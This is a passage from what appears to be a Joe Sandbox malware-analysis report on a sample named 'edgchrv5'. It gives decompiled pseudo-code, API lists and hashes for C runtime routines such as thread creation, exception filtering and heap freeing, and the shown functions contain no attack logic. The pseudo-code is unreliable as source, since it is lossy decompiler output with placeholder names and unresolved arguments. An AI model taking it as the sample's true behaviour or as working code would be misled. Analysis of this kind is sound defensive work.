                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 2579439406-0
                                                                                                • Opcode ID: 8f51f89bdc738fdcee8dd02c941e2263b4d28e855df5d6472391d7dc22f59c48
                                                                                                • Instruction ID: 4b999de7907f1fa4b6c1bdbeba49d6d52422c26c15b9234ff655a9c6f7a470f2
                                                                                                • Opcode Fuzzy Hash: 8f51f89bdc738fdcee8dd02c941e2263b4d28e855df5d6472391d7dc22f59c48
                                                                                                • Instruction Fuzzy Hash: A32103B4480204DFF726DF29E6486543BB4FB4C340F006959F58897248E7BEAA81CF59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E01005256() {
                                                                                                
                                                                                                				SetUnhandledExceptionFilter(E01005214);
                                                                                                				return 0;
                                                                                                			}



                                                                                                0x0100525b
                                                                                                0x01005263

                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00005214), ref: 0100525B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: fbbdf3dbae7c387d8a64395f59c8cbc35d1b45a020d0fde0e299eb2f49a44a62
                                                                                                • Instruction ID: eb150d025d597a251b6abf46cd3183e464933fc01bcb1c8ec8eeda2250f5ffeb
                                                                                                • Opcode Fuzzy Hash: fbbdf3dbae7c387d8a64395f59c8cbc35d1b45a020d0fde0e299eb2f49a44a62
                                                                                                • Instruction Fuzzy Hash: 499002F02A15054AAE1667755D0940725905E5B612F414AA47189CC088EA5940459A65
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bcc8f491d4af4b31e41485d222c01f682b69cb550252992b8ebcbe23119c9f10
                                                                                                • Instruction ID: 51509932a679419332269448163201033eb50d025f398f0e38aa8cd10d715b45
                                                                                                • Opcode Fuzzy Hash: bcc8f491d4af4b31e41485d222c01f682b69cb550252992b8ebcbe23119c9f10
                                                                                                • Instruction Fuzzy Hash: 8FF0F6B19483454BD7129EB888411E5BFF4EB12210B4849DEE4D893192E6369446C7A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 92%
                                                                                                			E01003408(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				struct HINSTANCE__* _t23;
                                                                                                				intOrPtr _t28;
                                                                                                				intOrPtr _t32;
                                                                                                				intOrPtr _t45;
                                                                                                				void* _t46;
                                                                                                
                                                                                                				_t35 = __ebx;
                                                                                                				_push(0xc);
                                                                                                				_push(0x100d488);
                                                                                                				E01003E98(__ebx, __edi, __esi);
                                                                                                				_t44 = L"KERNEL32.DLL";
                                                                                                				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                                                				if(_t23 == 0) {
                                                                                                					_t23 = E010039FD(_t44);
                                                                                                				}
                                                                                                				 *(_t46 - 0x1c) = _t23;
                                                                                                				_t45 =  *((intOrPtr*)(_t46 + 8));
                                                                                                				 *((intOrPtr*)(_t45 + 0x5c)) = 0x100c220;
                                                                                                				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                                                                                                				if(_t23 != 0) {
                                                                                                					_t35 = GetProcAddress;
                                                                                                					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                                                                                                					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                                                                                                				}
                                                                                                				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                                                                                                				 *((char*)(_t45 + 0xc8)) = 0x43;
                                                                                                				 *((char*)(_t45 + 0x14b)) = 0x43;
                                                                                                				 *(_t45 + 0x68) = 0x100e4b0;
                                                                                                				E01005CB2(_t35, 0xd);
                                                                                                				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                                                                                                				InterlockedIncrement( *(_t45 + 0x68));
                                                                                                				 *(_t46 - 4) = 0xfffffffe;
                                                                                                				E010034DD();
                                                                                                				E01005CB2(_t35, 0xc);
                                                                                                				 *(_t46 - 4) = 1;
                                                                                                				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                                                                                                				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                                                                                                				if(_t28 == 0) {
                                                                                                					_t32 =  *0x100e4a0; // 0x100e3c8
                                                                                                					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                                                                                                				}
                                                                                                				E01005E2E( *((intOrPtr*)(_t45 + 0x6c)));
                                                                                                				 *(_t46 - 4) = 0xfffffffe;
                                                                                                				return E01003EDD(E010034E6());
                                                                                                			}








                                                                                                0x01003408
                                                                                                0x01003408
                                                                                                0x0100340a
                                                                                                0x0100340f
                                                                                                0x01003414
                                                                                                0x0100341a
                                                                                                0x01003422
                                                                                                0x01003425
                                                                                                0x0100342a
                                                                                                0x0100342b
                                                                                                0x0100342e
                                                                                                0x01003431
                                                                                                0x0100343b
                                                                                                0x01003440
                                                                                                0x01003448
                                                                                                0x01003450
                                                                                                0x01003460
                                                                                                0x01003460
                                                                                                0x01003466
                                                                                                0x01003469
                                                                                                0x01003470
                                                                                                0x01003477
                                                                                                0x01003480
                                                                                                0x01003486
                                                                                                0x0100348d
                                                                                                0x01003493
                                                                                                0x0100349a
                                                                                                0x010034a1
                                                                                                0x010034a7
                                                                                                0x010034aa
                                                                                                0x010034ad
                                                                                                0x010034b2
                                                                                                0x010034b4
                                                                                                0x010034b9
                                                                                                0x010034b9
                                                                                                0x010034bf
                                                                                                0x010034c5
                                                                                                0x010034d6

                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0100D488,0000000C,01003543,00000000,00000000,?,010041B6,?,00000001,?,?,01005C3C,00000018,0100D558,0000000C), ref: 0100341A
                                                                                                • __crt_waiting_on_module_handle.LIBCMT ref: 01003425
                                                                                                  • Part of subcall function 010039FD: Sleep.KERNEL32(000003E8,?,?,0100332E,KERNEL32.DLL,?,0100339A,?,01002C75), ref: 01003A09
                                                                                                  • Part of subcall function 010039FD: GetModuleHandleW.KERNEL32(?,?,?,0100332E,KERNEL32.DLL,?,0100339A,?,01002C75), ref: 01003A12
                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0100344E
                                                                                                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0100345E
                                                                                                • __lock.LIBCMT ref: 01003480
                                                                                                • InterlockedIncrement.KERNEL32(0100E4B0), ref: 0100348D
                                                                                                • __lock.LIBCMT ref: 010034A1
                                                                                                • ___addlocaleref.LIBCMT ref: 010034BF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                • API String ID: 1028249917-2843748187
                                                                                                • Opcode ID: 8407afd248548e6b3f7ad74b356958b254ebeec87b3feea19ecd0b7e0823f333
                                                                                                • Instruction ID: b33008a88a3f6c66078adbd15c1753eaa7cf285ffa6dc10a03dad2304cb70a20
                                                                                                • Opcode Fuzzy Hash: 8407afd248548e6b3f7ad74b356958b254ebeec87b3feea19ecd0b7e0823f333
                                                                                                • Instruction Fuzzy Hash: 94119D71900702AEF723EF69D901B9ABBE0BF05314F118A5DE4D9AA2D0CB74A900CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 65%
                                                                                                			E01002C6A(intOrPtr __edx, long _a4, char _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
                                                                                                				struct _SECURITY_ATTRIBUTES* _v0;
                                                                                                				DWORD* _v12;
                                                                                                				void* _v20;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				void* _t27;
                                                                                                				void* _t33;
                                                                                                				DWORD* _t38;
                                                                                                				intOrPtr* _t40;
                                                                                                				void* _t42;
                                                                                                				void* _t48;
                                                                                                				long _t51;
                                                                                                				intOrPtr _t58;
                                                                                                				void* _t61;
                                                                                                				struct _SECURITY_ATTRIBUTES* _t62;
                                                                                                				intOrPtr* _t64;
                                                                                                				void* _t65;
                                                                                                
                                                                                                				_t58 = __edx;
                                                                                                				_push(_t64);
                                                                                                				E0100337A();
                                                                                                				_t27 = E0100335A(E01003374());
                                                                                                				if(_t27 != 0) {
                                                                                                					_t51 = _a4;
                                                                                                					 *((intOrPtr*)(_t27 + 0x54)) =  *((intOrPtr*)(_t51 + 0x54));
                                                                                                					 *((intOrPtr*)(_t27 + 0x58)) =  *((intOrPtr*)(_t51 + 0x58));
                                                                                                					_t58 =  *((intOrPtr*)(_t51 + 4));
                                                                                                					_push(_t51);
                                                                                                					 *((intOrPtr*)(_t27 + 4)) = _t58;
                                                                                                					E01003582(_t48, _t61, _t64, __eflags);
                                                                                                				} else {
                                                                                                					_t64 = _a4;
                                                                                                					if(E010033AE(E01003374(), _t64) == 0) {
                                                                                                						ExitThread(GetLastError());
                                                                                                					}
                                                                                                					 *_t64 = GetCurrentThreadId();
                                                                                                				}
                                                                                                				_t73 =  *0x101e424;
                                                                                                				if( *0x101e424 != 0) {
                                                                                                					_t42 = E01003940(_t73, 0x101e424);
                                                                                                					_pop(_t51);
                                                                                                					_t74 = _t42;
                                                                                                					if(_t42 != 0) {
                                                                                                						 *0x101e424(); // executed
                                                                                                					}
                                                                                                				}
                                                                                                				E01002C29(_t58, _t61, _t64, _t74); // executed
                                                                                                				asm("int3");
                                                                                                				_push(_t51);
                                                                                                				_push(_t48);
                                                                                                				_push(_t61);
                                                                                                				_t62 = _v0;
                                                                                                				_v20 = 0;
                                                                                                				_t75 = _t62;
                                                                                                				if(_t62 != 0) {
                                                                                                					_push(_t64);
                                                                                                					E0100337A();
                                                                                                					_t65 = E010041EA(1, 0x214);
                                                                                                					__eflags = _t65;
                                                                                                					if(__eflags == 0) {
                                                                                                						L17:
                                                                                                						_push(_t65);
                                                                                                						E01004117(0, _t62, _t65, __eflags);
                                                                                                						__eflags = _v12;
                                                                                                						if(_v12 != 0) {
                                                                                                							E010040F4(_v12);
                                                                                                						}
                                                                                                						_t33 = 0;
                                                                                                						__eflags = 0;
                                                                                                					} else {
                                                                                                						_push( *((intOrPtr*)(E01003568(0, _t58, _t62, __eflags) + 0x6c)));
                                                                                                						_push(_t65);
                                                                                                						E01003408(0, _t62, _t65, __eflags);
                                                                                                						 *(_t65 + 4) =  *(_t65 + 4) | 0xffffffff;
                                                                                                						 *((intOrPtr*)(_t65 + 0x58)) = _a12;
                                                                                                						_t38 = _a20;
                                                                                                						 *((intOrPtr*)(_t65 + 0x54)) = _t62;
                                                                                                						__eflags = _t38;
                                                                                                						if(_t38 == 0) {
                                                                                                							_t38 =  &_a8;
                                                                                                						}
                                                                                                						_t33 = CreateThread(_v0, _a4, E01002C6A, _t65, _a16, _t38); // executed
                                                                                                						__eflags = _t33;
                                                                                                						if(__eflags == 0) {
                                                                                                							_v12 = GetLastError();
                                                                                                							goto L17;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t40 = E010040CE(_t75);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					 *_t40 = 0x16;
                                                                                                					E010043BB(_t58, _t62, _t64);
                                                                                                					_t33 = 0;
                                                                                                				}
                                                                                                				return _t33;
                                                                                                			}






















                                                                                                0x01002c6a
                                                                                                0x01002c6f
                                                                                                0x01002c70
                                                                                                0x01002c7b
                                                                                                0x01002c82
                                                                                                0x01002cae
                                                                                                0x01002cb4
                                                                                                0x01002cba
                                                                                                0x01002cbd
                                                                                                0x01002cc0
                                                                                                0x01002cc1
                                                                                                0x01002cc4
                                                                                                0x01002c84
                                                                                                0x01002c84
                                                                                                0x01002c95
                                                                                                0x01002c9e
                                                                                                0x01002c9e
                                                                                                0x01002caa
                                                                                                0x01002caa
                                                                                                0x01002cc9
                                                                                                0x01002cd0
                                                                                                0x01002cd7
                                                                                                0x01002cdc
                                                                                                0x01002cdd
                                                                                                0x01002cdf
                                                                                                0x01002ce1
                                                                                                0x01002ce1
                                                                                                0x01002cdf
                                                                                                0x01002ce7
                                                                                                0x01002cec
                                                                                                0x01002cf2
                                                                                                0x01002cf3
                                                                                                0x01002cf4
                                                                                                0x01002cf5
                                                                                                0x01002cfa
                                                                                                0x01002cfd
                                                                                                0x01002cff
                                                                                                0x01002d1d
                                                                                                0x01002d1e
                                                                                                0x01002d2f
                                                                                                0x01002d33
                                                                                                0x01002d35
                                                                                                0x01002d81
                                                                                                0x01002d81
                                                                                                0x01002d82
                                                                                                0x01002d88
                                                                                                0x01002d8b
                                                                                                0x01002d90
                                                                                                0x01002d95
                                                                                                0x01002d96
                                                                                                0x01002d96
                                                                                                0x01002d37
                                                                                                0x01002d3c
                                                                                                0x01002d3f
                                                                                                0x01002d40
                                                                                                0x01002d48
                                                                                                0x01002d4c
                                                                                                0x01002d4f
                                                                                                0x01002d54
                                                                                                0x01002d57
                                                                                                0x01002d59
                                                                                                0x01002d5b
                                                                                                0x01002d5b
                                                                                                0x01002d6e
                                                                                                0x01002d74
                                                                                                0x01002d76
                                                                                                0x01002d7e
                                                                                                0x00000000
                                                                                                0x01002d7e
                                                                                                0x01002d76
                                                                                                0x01002d01
                                                                                                0x01002d01
                                                                                                0x01002d06
                                                                                                0x01002d07
                                                                                                0x01002d08
                                                                                                0x01002d09
                                                                                                0x01002d0a
                                                                                                0x01002d0b
                                                                                                0x01002d11
                                                                                                0x01002d19
                                                                                                0x01002d19
                                                                                                0x01002d9c

                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 01002C70
                                                                                                  • Part of subcall function 0100337A: TlsGetValue.KERNEL32(?,01002C75), ref: 01003383
                                                                                                  • Part of subcall function 0100337A: __decode_pointer.LIBCMT ref: 01003395
                                                                                                  • Part of subcall function 0100337A: TlsSetValue.KERNEL32(00000000,01002C75), ref: 010033A4
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 01002C7B
                                                                                                  • Part of subcall function 0100335A: TlsGetValue.KERNEL32(?,?,01002C80,00000000), ref: 01003368
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 01002C8E
                                                                                                  • Part of subcall function 010033AE: __decode_pointer.LIBCMT ref: 010033BF
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 01002C97
                                                                                                • ExitThread.KERNEL32 ref: 01002C9E
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 01002CA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue
                                                                                                • String ID:
                                                                                                • API String ID: 3607243393-0
                                                                                                • Opcode ID: e6c259e150d8e4bfbf257b2337154d8a0375406920008c6838f412688be08f06
                                                                                                • Instruction ID: 2c99f78f17ff2c6ab8e29dd09fcf784e4cee3cbfc5c1cdc3c2f30557305a5dbd
                                                                                                • Opcode Fuzzy Hash: e6c259e150d8e4bfbf257b2337154d8a0375406920008c6838f412688be08f06
                                                                                                • Instruction Fuzzy Hash: 61F08275400645AFF727EFB2C548C8E7BA9BF59244F20C294E8C48B345DE35D842CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 89%
                                                                                                			E01006230(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				signed int _t15;
                                                                                                				LONG* _t21;
                                                                                                				long _t23;
                                                                                                				void* _t31;
                                                                                                				LONG* _t33;
                                                                                                				void* _t34;
                                                                                                				void* _t35;
                                                                                                
                                                                                                				_t35 = __eflags;
                                                                                                				_t29 = __edx;
                                                                                                				_t25 = __ebx;
                                                                                                				_push(0xc);
                                                                                                				_push(0x100d598);
                                                                                                				E01003E98(__ebx, __edi, __esi);
                                                                                                				_t31 = E01003568(__ebx, __edx, __edi, _t35);
                                                                                                				_t15 =  *0x100ec80; // 0xfffffffe
                                                                                                				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                					E01005CB2(_t25, 0xd);
                                                                                                					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                					_t33 =  *(_t31 + 0x68);
                                                                                                					 *(_t34 - 0x1c) = _t33;
                                                                                                					__eflags = _t33 -  *0x100e8d8; // 0x1422b20
                                                                                                					if(__eflags != 0) {
                                                                                                						__eflags = _t33;
                                                                                                						if(_t33 != 0) {
                                                                                                							_t23 = InterlockedDecrement(_t33);
                                                                                                							__eflags = _t23;
                                                                                                							if(_t23 == 0) {
                                                                                                								__eflags = _t33 - 0x100e4b0;
                                                                                                								if(__eflags != 0) {
                                                                                                									_push(_t33);
                                                                                                									E01004117(_t25, _t31, _t33, __eflags);
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						_t21 =  *0x100e8d8; // 0x1422b20
                                                                                                						 *(_t31 + 0x68) = _t21;
                                                                                                						_t33 =  *0x100e8d8; // 0x1422b20
                                                                                                						 *(_t34 - 0x1c) = _t33;
                                                                                                						InterlockedIncrement(_t33);
                                                                                                					}
                                                                                                					 *(_t34 - 4) = 0xfffffffe;
                                                                                                					E010062CB();
                                                                                                				} else {
                                                                                                					_t33 =  *(_t31 + 0x68);
                                                                                                				}
                                                                                                				if(_t33 == 0) {
                                                                                                					E01003A2D(_t29, _t31, 0x20);
                                                                                                				}
                                                                                                				return E01003EDD(_t33);
                                                                                                			}










                                                                                                0x01006230
                                                                                                0x01006230
                                                                                                0x01006230
                                                                                                0x01006230
                                                                                                0x01006232
                                                                                                0x01006237
                                                                                                0x01006241
                                                                                                0x01006243
                                                                                                0x0100624b
                                                                                                0x0100626c
                                                                                                0x01006272
                                                                                                0x01006276
                                                                                                0x01006279
                                                                                                0x0100627c
                                                                                                0x01006282
                                                                                                0x01006284
                                                                                                0x01006286
                                                                                                0x01006289
                                                                                                0x0100628f
                                                                                                0x01006291
                                                                                                0x01006293
                                                                                                0x01006299
                                                                                                0x0100629b
                                                                                                0x0100629c
                                                                                                0x010062a1
                                                                                                0x01006299
                                                                                                0x01006291
                                                                                                0x010062a2
                                                                                                0x010062a7
                                                                                                0x010062aa
                                                                                                0x010062b0
                                                                                                0x010062b4
                                                                                                0x010062b4
                                                                                                0x010062ba
                                                                                                0x010062c1
                                                                                                0x01006253
                                                                                                0x01006253
                                                                                                0x01006253
                                                                                                0x01006258
                                                                                                0x0100625c
                                                                                                0x01006261
                                                                                                0x01006269

                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 0100623C
                                                                                                  • Part of subcall function 01003568: __getptd_noexit.LIBCMT ref: 0100356B
                                                                                                  • Part of subcall function 01003568: __amsg_exit.LIBCMT ref: 01003578
                                                                                                • __amsg_exit.LIBCMT ref: 0100625C
                                                                                                • __lock.LIBCMT ref: 0100626C
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 01006289
                                                                                                • InterlockedIncrement.KERNEL32(01422B20), ref: 010062B4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                • String ID:
                                                                                                • API String ID: 4271482742-0
                                                                                                • Opcode ID: 1e40022d86d769a114b35a40180aeb125ed04e6465a8ea473e779a76fdd7b624
                                                                                                • Instruction ID: cf5bc7e92140f62b6bb3e5b4d2e6765d99e9083e09ffd94ecadac2fce8faf165
                                                                                                • Opcode Fuzzy Hash: 1e40022d86d769a114b35a40180aeb125ed04e6465a8ea473e779a76fdd7b624
                                                                                                • Instruction Fuzzy Hash: 3C01C431905A12DBFB23AB59C40578D77A1BF05720F044545E9D0772C4CB3A5A51CBD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 41%
                                                                                                			E01004117(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr* _t10;
                                                                                                				intOrPtr _t13;
                                                                                                				intOrPtr _t23;
                                                                                                				void* _t25;
                                                                                                
                                                                                                				_push(0xc);
                                                                                                				_push(0x100d518);
                                                                                                				_t8 = E01003E98(__ebx, __edi, __esi);
                                                                                                				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                				if(_t23 == 0) {
                                                                                                					L9:
                                                                                                					return E01003EDD(_t8);
                                                                                                				}
                                                                                                				if( *0x101e2e0 != 3) {
                                                                                                					_push(_t23);
                                                                                                					L7:
                                                                                                					_t8 = HeapFree( *0x101cda4, 0, ??);
                                                                                                					_t31 = _t8;
                                                                                                					if(_t8 == 0) {
                                                                                                						_t10 = E010040CE(_t31);
                                                                                                						 *_t10 = E0100408C(GetLastError());
                                                                                                					}
                                                                                                					goto L9;
                                                                                                				}
                                                                                                				E01005CB2(__ebx, 4);
                                                                                                				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                				_t13 = E01006CBF(_t23);
                                                                                                				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                				if(_t13 != 0) {
                                                                                                					_push(_t23);
                                                                                                					_push(_t13);
                                                                                                					E01006CEF();
                                                                                                				}
                                                                                                				 *(_t25 - 4) = 0xfffffffe;
                                                                                                				_t8 = E0100416D();
                                                                                                				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                					goto L9;
                                                                                                				} else {
                                                                                                					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                					goto L7;
                                                                                                				}
                                                                                                			}







                                                                                                0x01004117
                                                                                                0x01004119
                                                                                                0x0100411e
                                                                                                0x01004123
                                                                                                0x01004128
                                                                                                0x0100419f
                                                                                                0x010041a4
                                                                                                0x010041a4
                                                                                                0x01004131
                                                                                                0x01004176
                                                                                                0x01004177
                                                                                                0x0100417f
                                                                                                0x01004185
                                                                                                0x01004187
                                                                                                0x01004189
                                                                                                0x0100419c
                                                                                                0x0100419e
                                                                                                0x00000000
                                                                                                0x01004187
                                                                                                0x01004135
                                                                                                0x0100413b
                                                                                                0x01004140
                                                                                                0x01004146
                                                                                                0x0100414b
                                                                                                0x0100414d
                                                                                                0x0100414e
                                                                                                0x0100414f
                                                                                                0x01004155
                                                                                                0x01004156
                                                                                                0x0100415d
                                                                                                0x01004166
                                                                                                0x00000000
                                                                                                0x01004168
                                                                                                0x01004168
                                                                                                0x00000000
                                                                                                0x01004168

                                                                                                APIs
                                                                                                • __lock.LIBCMT ref: 01004135
                                                                                                  • Part of subcall function 01005CB2: __mtinitlocknum.LIBCMT ref: 01005CC8
                                                                                                  • Part of subcall function 01005CB2: __amsg_exit.LIBCMT ref: 01005CD4
                                                                                                  • Part of subcall function 01005CB2: EnterCriticalSection.KERNEL32(?,?,?,01003613,0000000D,0100D4B0,00000008,01002CC9,?,00000000), ref: 01005CDC
                                                                                                • ___sbh_find_block.LIBCMT ref: 01004140
                                                                                                • ___sbh_free_block.LIBCMT ref: 0100414F
                                                                                                • HeapFree.KERNEL32(00000000,?,0100D518,0000000C,01003559,00000000,?,010041B6,?,00000001,?,?,01005C3C,00000018,0100D558,0000000C), ref: 0100417F
                                                                                                • GetLastError.KERNEL32(?,010041B6,?,00000001,?,?,01005C3C,00000018,0100D558,0000000C,01005CCD,?,?,?,01003613,0000000D), ref: 01004190
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                • String ID:
                                                                                                • API String ID: 2714421763-0
                                                                                                • Opcode ID: e699c0a86b306a9e9bb7d62ac7a4422ecd54a4fb2c2aead6b2a8e6af21d4a80c
                                                                                                • Instruction ID: eadc5be43537d8eb891800f18c3b784280f73d043a22254e948430c4d9e9f84b
                                                                                                • Opcode Fuzzy Hash: e699c0a86b306a9e9bb7d62ac7a4422ecd54a4fb2c2aead6b2a8e6af21d4a80c
                                                                                                • Instruction Fuzzy Hash: CB01A231E05306AAFB33ABB49D05BDE3AB4AF21360F100248F6D4EA1C0CB3985408B98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 64%
                                                                                                			E01002C5E(intOrPtr __edx, void* __edi, long _a4, char _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
                                                                                                				struct _SECURITY_ATTRIBUTES* _v0;
                                                                                                				intOrPtr _v4;
                                                                                                				DWORD* _v12;
                                                                                                				void* _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				void* __ebx;
                                                                                                				void* __esi;
                                                                                                				void* _t30;
                                                                                                				void* _t36;
                                                                                                				DWORD* _t41;
                                                                                                				intOrPtr* _t43;
                                                                                                				void* _t45;
                                                                                                				void* _t51;
                                                                                                				long _t54;
                                                                                                				intOrPtr _t61;
                                                                                                				void* _t64;
                                                                                                				intOrPtr _t65;
                                                                                                				intOrPtr* _t67;
                                                                                                				void* _t68;
                                                                                                				intOrPtr _t71;
                                                                                                				void* _t74;
                                                                                                
                                                                                                				_t64 = __edi;
                                                                                                				_t61 = __edx;
